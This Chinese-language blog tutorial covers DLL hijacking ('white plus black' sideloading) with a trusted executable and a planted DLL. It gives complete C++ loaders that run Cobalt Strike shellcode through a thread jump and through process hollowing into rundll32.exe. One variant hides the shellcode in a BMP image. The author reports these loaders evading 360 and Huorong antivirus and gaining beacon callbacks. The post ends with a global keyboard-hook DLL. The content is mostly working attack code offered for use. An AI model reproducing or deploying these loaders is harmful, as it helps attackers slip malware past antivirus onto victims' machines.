文章目录
- 前置知识
- dll加载
- dll寻找
- DLL劫持-白加黑-导入加载
- DLL劫持-白加黑-导出编译
- DLL劫持-白加黑-图片分离
- hook+dll
- 原理
- win api
- 核心代码
- 注意事项
前置知识
基础技能
- c语言基本知识
- win32 API 知识
- 会在微软官网查询API
- PE结构知识
原理
DLL劫持的原理主要就是windows下加载DLL的顺序。在加载DLL的时候,系统会依次从以下六个位置去查找所需要的DLL文件
- 程序所在目录
- 系统目录
- 16位系统目录
- Windows目录
- 当前目录
- PATH环境变量中的各个目录
dll加载
dllmain.cpp
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <Windows.h>
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
WinExec("calc.exe", SW_NORMAL);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
void msg() {
MessageBox(0, L"Dll-1 load succeed!", 0, 0);
}
framework.h
#pragma once
#define WIN32_LEAN_AND_MEAN // 从 Windows 头文件中排除极少使用的内容
// Windows 头文件
#include <windows.h>
extern "C" __declspec(dllexport) void msg(void);
a.c
#include <stdio.h>
#include <Windows.h>
typedef void(*msg)();
int main()
{
// 定义一个函数类DLLFUNC
HMODULE hDll = LoadLibrary(L"Dll1.dll");
if (hDll == NULL) {
printf("1");
return 0;
}
msg func = (msg)GetProcAddress(hDll, "msg");
if (func != NULL) {
//运行msg函数
(*func)();
}
return 0;
}
dll寻找
Process Monitor
- Include
Operation is CreateFile
Operation is LoadImage
Operation is QueryOpen
Path contains .dll
processname is kk.exe
Path begins with C:\test\KKcapture
- Exclude
Result is SUCCESS
- 过滤参考
Include the following filters:
Operation is CreateFile
Operation is LoadImage
Path contains .cpl
Path contains .dll
Path contains .drv
Path contains .exe
Path contains .ocx
Path contains .scr
Path contains .sys
Path begins with C:\test\KKcapture
Exclude the following filters:
Process Name is procmon.exe
Process Name is Procmon64.exe
Process Name is System
Operation begins with IRP_MJ_
Operation begins with FASTIO_
Result is SUCCESS
Path ends with pagefile.sys
windbg/procexp
均可一键导出加载的dll
打开待测exe文件
用Process Explorer查看待测exe打开调用的dll
ctrl+s保存文件,使用脚本文件处理,得到一个新的纯dll列表的文件
关闭待测软件,找到exe文件路径
打开chkDllhiJack,将待测exe文件路径以及dll列表填入相对应的位置,点击检测or运行
如果存在dll劫持漏洞,则输出框内出现对应的dll文件名;如果不存在,则提示no valid xxx;
复制payload.dll文件(打开计算器),改名为对应的dll文件名,放在exe文件同一路径下,双击exe文件,查看打开exe文件的同时是否开启了计算器。
DLL劫持-白加黑-导入加载
procexp/火绒剑 分析dll,选择一个dll文件来进行劫持,尽量找文件较小的dll文件
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include<windows.h>
#include<iostream>
HANDLE My_hThread = NULL;
unsigned char shellcode[] = "";
//CS生成32位shellcode
DWORD WINAPI ceshi(LPVOID pParameter)
{
__asm
{
mov eax, offset shellcode
jmp eax
}
return 0;
}
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH://初次调用dll时执行下面代码
My_hThread = ::CreateThread(NULL, 0, &ceshi, 0, 0, 0);//新建线程
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
extern"C" _declspec(dllexport) void test()
{
int a;
a = 0;
}
接下来利用Stud_PE来加载我们生成的dll,将修改后的libfontconfig-1.dll以及我们生产的dll文件都拖到kk录像机安装目录
dll被杀烂了,尝试强加密绕过杀软
DLL劫持-白加黑-导出编译
cloudmusic_reporter.exe(并发现是32位程序)单独复制出来运行会产生报错缺少dll文件。将缺失的dll文件复制到相同文件夹后即可成功运行
使用Dependencies工具对krpt.dll进行反编译,导出krpt.dll源码
使用visual studio 创建一个新项目。项目名称右键——打开项目位置——将反编译的dll源码复制进去。
选中dll源码拖入项目,工具就会自动加载源码
打开asm文件,将所有的jmp语句删除
根据文件中的教程,选中文件——右键属性——修改——点击应用
项目名称——右键属性——c/c++——代码生成——运行库——多线程(/MT)
预编译头——不使用预编译头
链接器——调试——生成调试信息——否
在libcurl.c中添加一句#include "pch.h"
完整代码结构如下
framework.h
#pragma once
#define WIN32_LEAN_AND_MEAN // 从 Windows 头文件中排除极少使用的内容
// Windows 头文件
#include <windows.h>
libcurl.h
#ifndef libcurl_H
#define libcurl_H
//aheadlib plugin for csharp.by snikeguo,email:408260925@qq.com
//codegen time:2023-11-24 11:06:32:169
#include<Windows.h>
#include<Shlwapi.h>
extern PVOID pfnAL_curl_easy_cleanup;//curl_easy_cleanup
.......
pch.h
// pch.h: 这是预编译标头文件。
// 下方列出的文件仅编译一次,提高了将来生成的生成性能。
// 这还将影响 IntelliSense 性能,包括代码完成和许多代码浏览功能。
// 但是,如果此处列出的文件中的任何一个在生成之间有更新,它们全部都将被重新编译。
// 请勿在此处添加要频繁更新的文件,这将使得性能优势无效。
#ifndef PCH_H
#define PCH_H
// 添加要在此处预编译的标头
#include "framework.h"
#endif //PCH_H
dllmain.cpp
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <Windows.h>
#include "libcurl.h"
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
MessageBox(0, L"Dll-1 load succeed!", 0, 0);
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
void msg() {
MessageBox(0, L"Dll-1 load succeed!", 0, 0);
}
libcurl.c
#include"libcurl.h"
#include "pch.h"
........
libcurl_jump.asm
.686P
.MODEL FLAT,C
.DATA
.......
pch.cpp
// pch.cpp: 与预编译标头对应的源文件
#include "pch.h"
// 当使用预编译的头时,需要使用此源文件,编译才能成功。
py脚本
处理dll格式
with open('a.txt','r',encoding="utf-8") as f:
for i in f:
print(i.split(' ')[-1])
处理jmp
with open('a.txt','r',encoding="utf-8") as f:
for i in f:
if "jmp" not in i:
print(i)
成功弹出计算器,换成上线代码dllmain.cpp
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <Windows.h>
#include "libcurl.h"
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
unsigned char hexData[] = "";
char* v7A = (char*)VirtualAlloc(0, _countof(hexData), 0x3000u, 0x40u);
memcpy((void*)v7A, hexData, _countof(hexData));
struct _PROCESS_INFORMATION ProcessInformation;
struct _STARTUPINFOA StartupInfo;
void* v24;
CONTEXT Context;
DWORD DwWrite = 0;
memset(&StartupInfo, 0, sizeof(StartupInfo));
StartupInfo.cb = 68;
BOOL result = CreateProcessA(0, (LPSTR)"rundll32.exe", 0, 0, 0, 0x44u, 0, 0, &StartupInfo, &ProcessInformation);
if (result)
{
Context.ContextFlags = 65539;
GetThreadContext(ProcessInformation.hThread, &Context);
v24 = VirtualAllocEx(ProcessInformation.hProcess, 0, _countof(hexData), 0x1000u, 0x40u);
WriteProcessMemory(ProcessInformation.hProcess, v24, v7A, _countof(hexData), &DwWrite);
Context.Eip = (DWORD)v24;
SetThreadContext(ProcessInformation.hThread, &Context);
ResumeThread(ProcessInformation.hThread);
CloseHandle(ProcessInformation.hThread);
result = CloseHandle(ProcessInformation.hProcess);
}
TerminateProcess(GetCurrentProcess(), 0);
};
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
成功过360,测试发现火绒也可绕过
DLL劫持-白加黑-图片分离
python2 dkmc.py
gen
set shellcode 这里是CS的shellcode
run
dllmain.cpp
#define _CRT_SECURE_NO_DEPRECATE
#include "framework.h"
#include "windows.h"
#include "libcurl.h"
#include <stdlib.h>
#include <stdio.h>
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
{
FILE* fp; // 定义流式文件操作变量fp,FILE结构体在stdio.h里面有定义
size_t size; // 定义文件字节数变量size
unsigned char* buffer; // 定义缓存指针变量
fp = fopen("output-1700840239.bmp", "rb"); //****修改为上方生成的图片****
// fseek()负号前移,正号后移
fseek(fp, 0, SEEK_END); // 文件指针指向文件末尾
// ftell()返回给定流 stream 的当前文件位置
size = ftell(fp); // size值为文件大小
fseek(fp, 0, SEEK_SET); // 文件指针指向文件开头
buffer = (unsigned char*)malloc(size); // 动态申请图片大小的内存空间(数组指针)
fread(buffer, size, 1, fp); // 从fp读取和显示1个size大小的数据
char* v7A = (char*)VirtualAlloc(0, size, 0x3000u, 0x40u);
memcpy((void*)v7A, buffer, size);
struct _PROCESS_INFORMATION ProcessInformation;
struct _STARTUPINFOA StartupInfo;
void* v24;
CONTEXT Context;
DWORD DwWrite = 0;
memset(&StartupInfo, 0, sizeof(StartupInfo));
StartupInfo.cb = 68;
BOOL result = CreateProcessA(0, (LPSTR)"rundll32.exe", 0, 0, 0, 0x44u, 0, 0, &StartupInfo, &ProcessInformation);
if (result)
{
Context.ContextFlags = 65539;
GetThreadContext(ProcessInformation.hThread, &Context);
v24 = VirtualAllocEx(ProcessInformation.hProcess, 0, size, 0x1000u, 0x40u);
WriteProcessMemory(ProcessInformation.hProcess, v24, v7A, size, &DwWrite);
Context.Eip = (DWORD)v24;
SetThreadContext(ProcessInformation.hThread, &Context);
ResumeThread(ProcessInformation.hThread);
CloseHandle(ProcessInformation.hThread);
result = CloseHandle(ProcessInformation.hProcess);
}
TerminateProcess(GetCurrentProcess(), 0);
};
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
将exe,dll及图片放在一起再次运行,成功上线
hook+dll
原理
- 当我们通过键盘输入,系统(OS)会把键盘输入这个事件发送到系统消息队列(OS message queue)
- 随后系统会从这个消息队列里拿出这个事件,判断这个输入是在哪个程序发生的。
- 发送到输入发生地程序的消息列表中(application message queue)
- 目标程序把键盘输入的事件拿出,执行并显示
win api
HINSTANCE和HMODULE
HINSTANCE的本质是模块基地址,他仅仅在同一进程中才有意义,跨进程的HINSTANCE是没有意义
HMODULE 是代表应用程序载入的模块,win32系统下通常是被载入模块的线性地址。
HINSTANCE 在win32下与HMODULE是相同的东西(只有在16位windows上,二者有所不同).
SetWindowsHookExW
HHOOK SetWindowsHookExW(
[in] int idHook,
[in] HOOKPROC lpfn,
[in] HINSTANCE hmod,
[in] DWORD dwThreadId
);
idHook 如键盘事件WH_KEYBOARD,安装监视击键消息的挂钩过程
HOOKPROC lpfn——钩子的处理函数,若设置的是键盘输入钩子,必须是微软定义的一个叫KeyboardProc的函数。
HINSTANCE hmod——模块句柄,因此一般设置钩子的地方在DLL中。
DWORD dwThreadId——需要设置钩子的线程ID,倘若为0则为全局钩子(所有程序都钩)。
KeyboardProc
LRESULT CALLBACK KeyboardProc(
_In_ int code,
_In_ WPARAM wParam,
_In_ LPARAM lParam
);
code 如果小于零,挂钩过程必须将消息传递给 CallNextHookEx 函数,而无需进一步处理,并且应返回 CallNextHookEx 返回的值
wParam 生成击键消息的密钥的虚拟密钥代码。
lParam 31转换状态,如果按下键,则值为 0;如果释放键,则值为 1。
!(lParam & 0x80000000) 第三十二位的1和lParam的31位相与,按下键时判断为真
EXTERN_C,__declspec(dllexport)
#define EXTERN_C extern "C"
__declspec(dllexport)关键字从 DLL 中导出数据、函数、类或类成员函数
GetLastError
返回值是调用线程的最后错误代码
UnhookWindowsHookEx
BOOL UnhookWindowsHookEx(
[in] HHOOK hhk
);
删除 SetWindowsHookEx 函数安装在挂钩链中的挂钩过程。
hhk 要移除的挂钩的句柄
DllMain
BOOL WINAPI DllMain(
_In_ HINSTANCE hinstDLL,
_In_ DWORD fdwReason,
_In_ LPVOID lpvReserved
);
hinstDLL DLL 模块的句柄,值是 DLL 的基址
GetModuleFileNameA
检索包含指定模块的文件的完全限定路径,模块必须已由当前进程加载
DWORD GetModuleFileNameA(
[in, optional] HMODULE hModule,
[out] LPSTR lpFilename,
[in] DWORD nSize
);
hModule 正在请求其路径的已加载模块的句柄.此参数为 NULL,则 GetModuleFileName 将检索当前进程的可执行文件的路径
strrchr
C 库函数 char *strrchr(const char *str, int c) 在参数 str 所指向的字符串中搜索最后一次出现字符 c(一个无符号字符)的位置。
如果找到字符,它将返回一个指向该字符的指针,否则返回 NULL
核心代码
dllmain.cpp
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <Windows.h>
#include <stdio.h>
HINSTANCE g_hDll;
HHOOK g_hHook;
BOOL APIENTRY DllMain(HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
g_hDll = hModule;
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
LRESULT CALLBACK KeyboarProc(int nCode, WPARAM wParam, LPARAM lParam)
{
char szPath[MAX_PATH];
char* p = NULL;
if (nCode >= 0)
{
if (!(lParam & 0x80000000))
{
GetModuleFileNameA(NULL, szPath, MAX_PATH);
p = strrchr(szPath, '\\');
if (!_stricmp(p + 1, "notepad.exe"))//只对notepad进程拦截
{
return 1;
}
}
}
return CallNextHookEx(g_hHook, nCode, wParam, lParam);
}
EXTERN_C __declspec(dllexport) void HookStart()
{
g_hHook = SetWindowsHookEx(WH_KEYBOARD, KeyboarProc, g_hDll, 0);
DWORD errCode = GetLastError();
printf("%d", errCode);
}
EXTERN_C __declspec(dllexport) void HookStop()
{
if (g_hHook)
{
UnhookWindowsHookEx(g_hHook);
g_hHook = NULL;
}
}
inject.c
//hook.cpp
#include <Windows.h>
#include <conio.h>
#include <stdio.h>
typedef void(*HOOKSTART)();
typedef void(*HOOKSTOP)();
int main()
{
HMODULE hDll = LoadLibrary(L"KeyHook.dll");
if (!hDll)
{
return 0;
}
HOOKSTART hookStart = (HOOKSTART)GetProcAddress(hDll, "HookStart");
if (!hookStart)
{
return 0;
}
HOOKSTOP hookStop = (HOOKSTOP)GetProcAddress(hDll, "HookStop");
if (!hookStop)
{
return 0;
}
hookStart();
printf("press 'q' to quit\n");
while (_getch() != 'q')
{
}
hookStop();
FreeLibrary(hDll);
}
效果展示
- typora可以正常输入,但是输入时被加载KeyHook.dll
- notepad无法输入,且按下键盘被加载KeyHook.dll
注意事项
- 电脑为64位,所以应该编译成64位运行,否则32位的DLL不能注入64位的程序就会整个窗口卡住。即按键事件分发不到具体的钩子处理函数,而事件已经被标志为已挂钩,必须找到处理函数。这就会产生事件无法得到处理,程序卡死的现象
